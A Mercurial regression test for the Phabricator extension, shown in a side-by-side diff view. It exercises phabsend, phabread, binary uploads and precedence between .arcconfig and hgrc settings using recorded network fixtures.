62 $ echo more >> alpha
77 $ echo more >> alpha
63 $ HGEDITOR=true hg ci --amend
78 $ HGEDITOR=true hg ci --amend
64 saved backup bundle to $TESTTMP/repo/.hg/strip-backup/347bf67801e5-3bf313e4-amend.hg
79 saved backup bundle to $TESTTMP/repo/.hg/strip-backup/347bf67801e5-3bf313e4-amend.hg
65 $ echo beta > beta
80 $ echo beta > beta
66 $ hg ci --addremove -m 'create beta for phabricator test'
81 $ hg ci --addremove -m 'create beta for phabricator test'
67 adding beta
82 adding beta
68 $ hg phabsend -r ".^::" --test-vcr "$VCR/phabsend-update-alpha-create-beta.json"
83 $ hg phabsend -r ".^::" --test-vcr "$VCR/phabsend-update-alpha-create-beta.json"
69 D7915 - updated - c44b38f24a45: create alpha for phabricator test \xe2\x82\xac (esc)
84 D7915 - updated - c44b38f24a45: create alpha for phabricator test \xe2\x82\xac (esc)
70 D7916 - created - 9e6901f21d5b: create beta for phabricator test
85 D7916 - created - 9e6901f21d5b: create beta for phabricator test
71 saved backup bundle to $TESTTMP/repo/.hg/strip-backup/9e6901f21d5b-1fcd4f0e-phabsend.hg
86 saved backup bundle to $TESTTMP/repo/.hg/strip-backup/9e6901f21d5b-1fcd4f0e-phabsend.hg
72 $ unset HGENCODING
87 $ unset HGENCODING
73
88
74 The amend won't explode after posting a public commit. The local tag is left
89 The amend won't explode after posting a public commit. The local tag is left
75 behind to identify it.
90 behind to identify it.
76
91
77 $ echo 'public change' > beta
92 $ echo 'public change' > beta
78 $ hg ci -m 'create public change for phabricator testing'
93 $ hg ci -m 'create public change for phabricator testing'
79 $ hg phase --public .
94 $ hg phase --public .
80 $ echo 'draft change' > alpha
95 $ echo 'draft change' > alpha
81 $ hg ci -m 'create draft change for phabricator testing'
96 $ hg ci -m 'create draft change for phabricator testing'
82 $ hg phabsend --amend -r '.^::' --test-vcr "$VCR/phabsend-create-public.json"
97 $ hg phabsend --amend -r '.^::' --test-vcr "$VCR/phabsend-create-public.json"
83 D7917 - created - 7b4185ab5d16: create public change for phabricator testing
98 D7917 - created - 7b4185ab5d16: create public change for phabricator testing
84 D7918 - created - 251c1c333fc6: create draft change for phabricator testing
99 D7918 - created - 251c1c333fc6: create draft change for phabricator testing
85 warning: not updating public commit 2:7b4185ab5d16
100 warning: not updating public commit 2:7b4185ab5d16
86 saved backup bundle to $TESTTMP/repo/.hg/strip-backup/251c1c333fc6-41cb7c3b-phabsend.hg
101 saved backup bundle to $TESTTMP/repo/.hg/strip-backup/251c1c333fc6-41cb7c3b-phabsend.hg
87 $ hg tags -v
102 $ hg tags -v
88 tip 3:3244dc4a3334
103 tip 3:3244dc4a3334
89 D7917 2:7b4185ab5d16 local
104 D7917 2:7b4185ab5d16 local
90
105
91 $ hg debugcallconduit user.search --test-vcr "$VCR/phab-conduit.json" <<EOF
106 $ hg debugcallconduit user.search --test-vcr "$VCR/phab-conduit.json" <<EOF
92 > {
107 > {
93 > "constraints": {
108 > "constraints": {
94 > "isBot": true
109 > "isBot": true
95 > }
110 > }
96 > }
111 > }
97 > EOF
112 > EOF
98 {
113 {
99 "cursor": {
114 "cursor": {
100 "after": null,
115 "after": null,
101 "before": null,
116 "before": null,
102 "limit": 100,
117 "limit": 100,
103 "order": null
118 "order": null
104 },
119 },
105 "data": [],
120 "data": [],
106 "maps": {},
121 "maps": {},
107 "query": {
122 "query": {
108 "queryKey": null
123 "queryKey": null
109 }
124 }
110 }
125 }
111
126
112 Template keywords
127 Template keywords
113 $ hg log -T'{rev} {phabreview|json}\n'
128 $ hg log -T'{rev} {phabreview|json}\n'
114 3 {"id": "D7918", "url": "https://phab.mercurial-scm.org/D7918"}
129 3 {"id": "D7918", "url": "https://phab.mercurial-scm.org/D7918"}
115 2 {"id": "D7917", "url": "https://phab.mercurial-scm.org/D7917"}
130 2 {"id": "D7917", "url": "https://phab.mercurial-scm.org/D7917"}
116 1 {"id": "D7916", "url": "https://phab.mercurial-scm.org/D7916"}
131 1 {"id": "D7916", "url": "https://phab.mercurial-scm.org/D7916"}
117 0 {"id": "D7915", "url": "https://phab.mercurial-scm.org/D7915"}
132 0 {"id": "D7915", "url": "https://phab.mercurial-scm.org/D7915"}
118
133
119 $ hg log -T'{rev} {if(phabreview, "{phabreview.url} {phabreview.id}")}\n'
134 $ hg log -T'{rev} {if(phabreview, "{phabreview.url} {phabreview.id}")}\n'
120 3 https://phab.mercurial-scm.org/D7918 D7918
135 3 https://phab.mercurial-scm.org/D7918 D7918
121 2 https://phab.mercurial-scm.org/D7917 D7917
136 2 https://phab.mercurial-scm.org/D7917 D7917
122 1 https://phab.mercurial-scm.org/D7916 D7916
137 1 https://phab.mercurial-scm.org/D7916 D7916
123 0 https://phab.mercurial-scm.org/D7915 D7915
138 0 https://phab.mercurial-scm.org/D7915 D7915
124
139
125 Commenting when phabsending:
140 Commenting when phabsending:
126 $ echo comment > comment
141 $ echo comment > comment
127 $ hg ci --addremove -m "create comment for phabricator test"
142 $ hg ci --addremove -m "create comment for phabricator test"
128 adding comment
143 adding comment
129 $ hg phabsend -r . -m "For default branch" --test-vcr "$VCR/phabsend-comment-created.json"
144 $ hg phabsend -r . -m "For default branch" --test-vcr "$VCR/phabsend-comment-created.json"
130 D7919 - created - d5dddca9023d: create comment for phabricator test
145 D7919 - created - d5dddca9023d: create comment for phabricator test
131 saved backup bundle to $TESTTMP/repo/.hg/strip-backup/d5dddca9023d-adf673ba-phabsend.hg
146 saved backup bundle to $TESTTMP/repo/.hg/strip-backup/d5dddca9023d-adf673ba-phabsend.hg
132 $ echo comment2 >> comment
147 $ echo comment2 >> comment
133 $ hg ci --amend
148 $ hg ci --amend
134 saved backup bundle to $TESTTMP/repo/.hg/strip-backup/f7db812bbe1d-8fcded77-amend.hg
149 saved backup bundle to $TESTTMP/repo/.hg/strip-backup/f7db812bbe1d-8fcded77-amend.hg
135 $ hg phabsend -r . -m "Address review comments" --test-vcr "$VCR/phabsend-comment-updated.json"
150 $ hg phabsend -r . -m "Address review comments" --test-vcr "$VCR/phabsend-comment-updated.json"
136 D7919 - updated - 1849d7828727: create comment for phabricator test
151 D7919 - updated - 1849d7828727: create comment for phabricator test
137
152
138 Phabsending a skipped commit:
153 Phabsending a skipped commit:
139 $ hg phabsend --no-amend -r . --test-vcr "$VCR/phabsend-skipped.json"
154 $ hg phabsend --no-amend -r . --test-vcr "$VCR/phabsend-skipped.json"
140 D7919 - skipped - 1849d7828727: create comment for phabricator test
155 D7919 - skipped - 1849d7828727: create comment for phabricator test
141
156
142 Phabesending a new binary, a modified binary, and a removed binary
157 Phabesending a new binary, a modified binary, and a removed binary
143
158
144 >>> open('bin', 'wb').write(b'\0a') and None
159 >>> open('bin', 'wb').write(b'\0a') and None
145 $ hg ci -Am 'add binary'
160 $ hg ci -Am 'add binary'
146 adding bin
161 adding bin
147 >>> open('bin', 'wb').write(b'\0b') and None
162 >>> open('bin', 'wb').write(b'\0b') and None
148 $ hg ci -m 'modify binary'
163 $ hg ci -m 'modify binary'
149 $ hg rm bin
164 $ hg rm bin
150 $ hg ci -m 'remove binary'
165 $ hg ci -m 'remove binary'
151 $ hg phabsend -r .~2:: --test-vcr "$VCR/phabsend-binary.json"
166 $ hg phabsend -r .~2:: --test-vcr "$VCR/phabsend-binary.json"
152 uploading bin@aa24a81f55de
167 uploading bin@aa24a81f55de
153 D8007 - created - aa24a81f55de: add binary
168 D8007 - created - aa24a81f55de: add binary
154 uploading bin@d8d62a881b54
169 uploading bin@d8d62a881b54
155 D8008 - created - d8d62a881b54: modify binary
170 D8008 - created - d8d62a881b54: modify binary
156 D8009 - created - af55645b2e29: remove binary
171 D8009 - created - af55645b2e29: remove binary
157 saved backup bundle to $TESTTMP/repo/.hg/strip-backup/aa24a81f55de-a3a0cf24-phabsend.hg
172 saved backup bundle to $TESTTMP/repo/.hg/strip-backup/aa24a81f55de-a3a0cf24-phabsend.hg
158
173
159 Phabsend a renamed binary and a copied binary, with and without content changes
174 Phabsend a renamed binary and a copied binary, with and without content changes
160 to src and dest
175 to src and dest
161
176
162 >>> open('bin2', 'wb').write(b'\0c') and None
177 >>> open('bin2', 'wb').write(b'\0c') and None
163 $ hg ci -Am 'add another binary'
178 $ hg ci -Am 'add another binary'
164 adding bin2
179 adding bin2
165
180
166 TODO: "bin2" can't be viewed in this commit (left or right side), and the URL
181 TODO: "bin2" can't be viewed in this commit (left or right side), and the URL
167 looks much different than when viewing "bin2_moved". No idea if this is a phab
182 looks much different than when viewing "bin2_moved". No idea if this is a phab
168 bug, or phabsend bug. The patch (as printed by phabread) look reasonable
183 bug, or phabsend bug. The patch (as printed by phabread) look reasonable
169 though.
184 though.
170
185
171 $ hg mv bin2 bin2_moved
186 $ hg mv bin2 bin2_moved
172 $ hg ci -m "moved binary"
187 $ hg ci -m "moved binary"
173
188
174 Note: "bin2_moved" is also not viewable in phabricator with this review
189 Note: "bin2_moved" is also not viewable in phabricator with this review
175
190
176 $ hg cp bin2_moved bin2_copied
191 $ hg cp bin2_moved bin2_copied
177 $ hg ci -m "copied binary"
192 $ hg ci -m "copied binary"
178
193
179 Note: "bin2_moved_again" is marked binary in phabricator, and both sides of it
194 Note: "bin2_moved_again" is marked binary in phabricator, and both sides of it
180 are viewable in their proper state. "bin2_copied" is not viewable, and not
195 are viewable in their proper state. "bin2_copied" is not viewable, and not
181 listed as binary in phabricator.
196 listed as binary in phabricator.
182
197
183 >>> open('bin2_copied', 'wb').write(b'\0move+mod') and None
198 >>> open('bin2_copied', 'wb').write(b'\0move+mod') and None
184 $ hg mv bin2_copied bin2_moved_again
199 $ hg mv bin2_copied bin2_moved_again
185 $ hg ci -m "move+mod copied binary"
200 $ hg ci -m "move+mod copied binary"
186
201
187 Note: "bin2_moved" and "bin2_moved_copy" are both marked binary, and both
202 Note: "bin2_moved" and "bin2_moved_copy" are both marked binary, and both
188 viewable on each side.
203 viewable on each side.
189
204
190 >>> open('bin2_moved', 'wb').write(b'\0precopy mod') and None
205 >>> open('bin2_moved', 'wb').write(b'\0precopy mod') and None
191 $ hg cp bin2_moved bin2_moved_copied
206 $ hg cp bin2_moved bin2_moved_copied
192 >>> open('bin2_moved', 'wb').write(b'\0copy src+mod') and None
207 >>> open('bin2_moved', 'wb').write(b'\0copy src+mod') and None
193 $ hg ci -m "copy+mod moved binary"
208 $ hg ci -m "copy+mod moved binary"
194
209
195 $ hg phabsend -r .~4:: --test-vcr "$VCR/phabsend-binary-renames.json"
210 $ hg phabsend -r .~4:: --test-vcr "$VCR/phabsend-binary-renames.json"
196 uploading bin2@f42f9195e00c
211 uploading bin2@f42f9195e00c
197 D8128 - created - f42f9195e00c: add another binary
212 D8128 - created - f42f9195e00c: add another binary
198 D8129 - created - 834ab31d80ae: moved binary
213 D8129 - created - 834ab31d80ae: moved binary
199 D8130 - created - 494b750e5194: copied binary
214 D8130 - created - 494b750e5194: copied binary
200 uploading bin2_moved_again@25f766b50cc2
215 uploading bin2_moved_again@25f766b50cc2
201 D8131 - created - 25f766b50cc2: move+mod copied binary
216 D8131 - created - 25f766b50cc2: move+mod copied binary
202 uploading bin2_moved_copied@1b87b363a5e4
217 uploading bin2_moved_copied@1b87b363a5e4
203 uploading bin2_moved@1b87b363a5e4
218 uploading bin2_moved@1b87b363a5e4
204 D8132 - created - 1b87b363a5e4: copy+mod moved binary
219 D8132 - created - 1b87b363a5e4: copy+mod moved binary
205 saved backup bundle to $TESTTMP/repo/.hg/strip-backup/f42f9195e00c-e82a0769-phabsend.hg
220 saved backup bundle to $TESTTMP/repo/.hg/strip-backup/f42f9195e00c-e82a0769-phabsend.hg
206
221
207 Phabreading a DREV with a local:commits time as a string:
222 Phabreading a DREV with a local:commits time as a string:
208 $ hg phabread --test-vcr "$VCR/phabread-str-time.json" D1285
223 $ hg phabread --test-vcr "$VCR/phabread-str-time.json" D1285
209 # HG changeset patch
224 # HG changeset patch
210 # User Pulkit Goyal <7895pulkit@gmail.com>
225 # User Pulkit Goyal <7895pulkit@gmail.com>
211 # Date 1509404054 -19800
226 # Date 1509404054 -19800
212 # Node ID 44fc1c1f1774a76423b9c732af6938435099bcc5
227 # Node ID 44fc1c1f1774a76423b9c732af6938435099bcc5
213 # Parent 8feef8ef8389a3b544e0a74624f1efc3a8d85d35
228 # Parent 8feef8ef8389a3b544e0a74624f1efc3a8d85d35
214 repoview: add a new attribute _visibilityexceptions and related API
229 repoview: add a new attribute _visibilityexceptions and related API
215
230
216 Currently we don't have a defined way in core to make some hidden revisions
231 Currently we don't have a defined way in core to make some hidden revisions
217 visible in filtered repo. Extensions to achieve the purpose of unhiding some
232 visible in filtered repo. Extensions to achieve the purpose of unhiding some
218 hidden commits, wrap repoview.pinnedrevs() function.
233 hidden commits, wrap repoview.pinnedrevs() function.
219
234
220 To make the above task simple and have well defined API, this patch adds a new
235 To make the above task simple and have well defined API, this patch adds a new
221 attribute '_visibilityexceptions' to repoview class which will contains
236 attribute '_visibilityexceptions' to repoview class which will contains
222 the hidden revs which should be exception.
237 the hidden revs which should be exception.
223 This will allow to set different exceptions for different repoview objects
238 This will allow to set different exceptions for different repoview objects
224 backed by the same unfiltered repo.
239 backed by the same unfiltered repo.
225
240
226 This patch also adds API to add revs to the attribute set and get them.
241 This patch also adds API to add revs to the attribute set and get them.
227
242
228 Thanks to Jun for suggesting the use of repoview class instead of localrepo.
243 Thanks to Jun for suggesting the use of repoview class instead of localrepo.
229
244
230 Differential Revision: https://phab.mercurial-scm.org/D1285
245 Differential Revision: https://phab.mercurial-scm.org/D1285
231 diff --git a/mercurial/repoview.py b/mercurial/repoview.py
246 diff --git a/mercurial/repoview.py b/mercurial/repoview.py
232 --- a/mercurial/repoview.py
247 --- a/mercurial/repoview.py
233 +++ b/mercurial/repoview.py
248 +++ b/mercurial/repoview.py
234 @@ * @@ (glob)
249 @@ * @@ (glob)
235 subclasses of `localrepo`. Eg: `bundlerepo` or `statichttprepo`.
250 subclasses of `localrepo`. Eg: `bundlerepo` or `statichttprepo`.
236 """
251 """
237
252
238 + # hidden revs which should be visible
253 + # hidden revs which should be visible
239 + _visibilityexceptions = set()
254 + _visibilityexceptions = set()
240 +
255 +
241 def __init__(self, repo, filtername):
256 def __init__(self, repo, filtername):
242 object.__setattr__(self, r'_unfilteredrepo', repo)
257 object.__setattr__(self, r'_unfilteredrepo', repo)
243 object.__setattr__(self, r'filtername', filtername)
258 object.__setattr__(self, r'filtername', filtername)
244 @@ -231,6 +234,14 @@
259 @@ -231,6 +234,14 @@
245 return self
260 return self
246 return self.unfiltered().filtered(name)
261 return self.unfiltered().filtered(name)
247
262
248 + def addvisibilityexceptions(self, revs):
263 + def addvisibilityexceptions(self, revs):
249 + """adds hidden revs which should be visible to set of exceptions"""
264 + """adds hidden revs which should be visible to set of exceptions"""
250 + self._visibilityexceptions.update(revs)
265 + self._visibilityexceptions.update(revs)
251 +
266 +
252 + def getvisibilityexceptions(self):
267 + def getvisibilityexceptions(self):
253 + """returns the set of hidden revs which should be visible"""
268 + """returns the set of hidden revs which should be visible"""
254 + return self._visibilityexceptions
269 + return self._visibilityexceptions
255 +
270 +
256 # everything access are forwarded to the proxied repo
271 # everything access are forwarded to the proxied repo
257 def __getattr__(self, attr):
272 def __getattr__(self, attr):
258 return getattr(self._unfilteredrepo, attr)
273 return getattr(self._unfilteredrepo, attr)
259 diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py
274 diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py
260 --- a/mercurial/localrepo.py
275 --- a/mercurial/localrepo.py
261 +++ b/mercurial/localrepo.py
276 +++ b/mercurial/localrepo.py
262 @@ -570,6 +570,14 @@
277 @@ -570,6 +570,14 @@
263 def close(self):
278 def close(self):
264 self._writecaches()
279 self._writecaches()
265
280
266 + def addvisibilityexceptions(self, exceptions):
281 + def addvisibilityexceptions(self, exceptions):
267 + # should be called on a filtered repository
282 + # should be called on a filtered repository
268 + pass
283 + pass
269 +
284 +
270 + def getvisibilityexceptions(self):
285 + def getvisibilityexceptions(self):
271 + # should be called on a filtered repository
286 + # should be called on a filtered repository
272 + return set()
287 + return set()
273 +
288 +
274 def _loadextensions(self):
289 def _loadextensions(self):
275 extensions.loadall(self.ui)
290 extensions.loadall(self.ui)
276
291
277
292
278 A bad .arcconfig doesn't error out
293 A bad .arcconfig doesn't error out
279 $ echo 'garbage' > .arcconfig
294 $ echo 'garbage' > .arcconfig
280 $ hg config phabricator --debug
295 $ hg config phabricator --debug
281 invalid JSON in $TESTTMP/repo/.arcconfig
296 invalid JSON in $TESTTMP/repo/.arcconfig
282 read config from: */.hgrc (glob)
297 read config from: */.hgrc (glob)
283 $TESTTMP/repo/.hg/hgrc:*: phabricator.url=https://phab.mercurial-scm.org/ (glob)
298 $TESTTMP/repo/.hg/hgrc:*: phabricator.url=https://phab.mercurial-scm.org/ (glob)
284 $TESTTMP/repo/.hg/hgrc:*: phabricator.callsign=HG (glob)
299 $TESTTMP/repo/.hg/hgrc:*: phabricator.callsign=HG (glob)
285
300
286 The .arcconfig content overrides global config
301 The .arcconfig content overrides global config
287 $ cat >> $HGRCPATH << EOF
302 $ cat >> $HGRCPATH << EOF
288 > [phabricator]
303 > [phabricator]
289 > url = global
304 > url = global
290 > callsign = global
305 > callsign = global
291 > EOF
306 > EOF
292 $ cp $TESTDIR/../.arcconfig .
307 $ cp $TESTDIR/../.arcconfig .
293 $ mv .hg/hgrc .hg/hgrc.bak
308 $ mv .hg/hgrc .hg/hgrc.bak
294 $ hg config phabricator --debug
309 $ hg config phabricator --debug
295 read config from: */.hgrc (glob)
310 read config from: */.hgrc (glob)
296 $TESTTMP/repo/.arcconfig: phabricator.callsign=HG
311 $TESTTMP/repo/.arcconfig: phabricator.callsign=HG
297 $TESTTMP/repo/.arcconfig: phabricator.url=https://phab.mercurial-scm.org/
312 $TESTTMP/repo/.arcconfig: phabricator.url=https://phab.mercurial-scm.org/
298
313
299 But it doesn't override local config
314 But it doesn't override local config
300 $ cat >> .hg/hgrc << EOF
315 $ cat >> .hg/hgrc << EOF
301 > [phabricator]
316 > [phabricator]
302 > url = local
317 > url = local
303 > callsign = local
318 > callsign = local
304 > EOF
319 > EOF
305 $ hg config phabricator --debug
320 $ hg config phabricator --debug
306 read config from: */.hgrc (glob)
321 read config from: */.hgrc (glob)
307 $TESTTMP/repo/.hg/hgrc:*: phabricator.url=local (glob)
322 $TESTTMP/repo/.hg/hgrc:*: phabricator.url=local (glob)
308 $TESTTMP/repo/.hg/hgrc:*: phabricator.callsign=local (glob)
323 $TESTTMP/repo/.hg/hgrc:*: phabricator.callsign=local (glob)
309 $ mv .hg/hgrc.bak .hg/hgrc
324 $ mv .hg/hgrc.bak .hg/hgrc
310
325
311 $ cd ..
326 $ cd ..
General Comments 0
You need to be logged in to leave comments. Login now